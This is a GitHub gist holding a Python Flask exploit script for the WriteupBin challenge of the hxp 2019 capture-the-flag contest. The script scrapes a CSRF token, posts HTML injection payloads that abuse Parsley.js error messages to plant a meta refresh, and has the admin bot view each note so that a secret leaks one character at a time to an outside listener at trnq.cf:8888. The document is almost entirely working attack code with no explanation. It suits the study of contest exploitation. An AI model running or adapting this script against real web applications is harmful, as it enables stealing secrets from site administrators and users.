Created
December 29, 2019 20:24
Star
You must be signed in to star a gist
Payload to WriteupBin hxp2019 CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from flask import Flask | |
import time | |
import requests | |
import os | |
import re | |
import sys | |
app = Flask(__name__) | |
prefix = '1800a1' | |
URL = 'http://78.46.216.67:8001/' | |
CSRF = '' | |
alph = 'abcdef0123456789' | |
sess = requests.Session() | |
payload = ''' | |
<form data-parsley-validate> | |
<input id=x value=11111> | |
<input data-parsley-error-message='<meta http-equiv=refresh content="0;http://trnq.cf:8888/c/{flag}">' data-parsley-trigger="blur" value="11111" data-parsley-equalto='a[href^="/show.php?id={flag}"],#x' autofocus> | |
</form> | |
<base href='/a' target='terjanq'></base> | |
''' | |
def report(): | |
pass | |
def login(): | |
global CSRF | |
r = sess.get(URL) | |
CSRF = re.search(r'<input type="hidden" name="c" value="([a-f0-9]+)">', r.text).group(1) | |
def gen_payload(word): | |
return payload.format(flag=word) | |
def send_payload(word): | |
for c in alph: | |
if(len(word) < len(prefix)): | |
break | |
content = gen_payload(word+c) | |
print("Sent %s" % word + c) | |
r = sess.post(URL+'add.php', data={ | |
'c': CSRF, | |
'content': content | |
}, allow_redirects=False) | |
note_id = re.search(r"/show.php\?id=([a-f0-9]+)", r.headers['Location']).group(1) | |
sess.post(URL+'/admin.php', data={ | |
'c': CSRF, | |
'id': note_id | |
}) | |
time.sleep(1) | |
@app.route('/c/<word>') | |
def get_code(word): | |
global prefix | |
prefix = word | |
print(word) | |
send_payload(word) | |
return "ok" | |
@app.route('/start') | |
def start(): | |
send_payload(prefix) | |
return "ok" | |
if __name__ == '__main__': | |
login() | |
app.run(host="0.0.0.0", port=8888) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment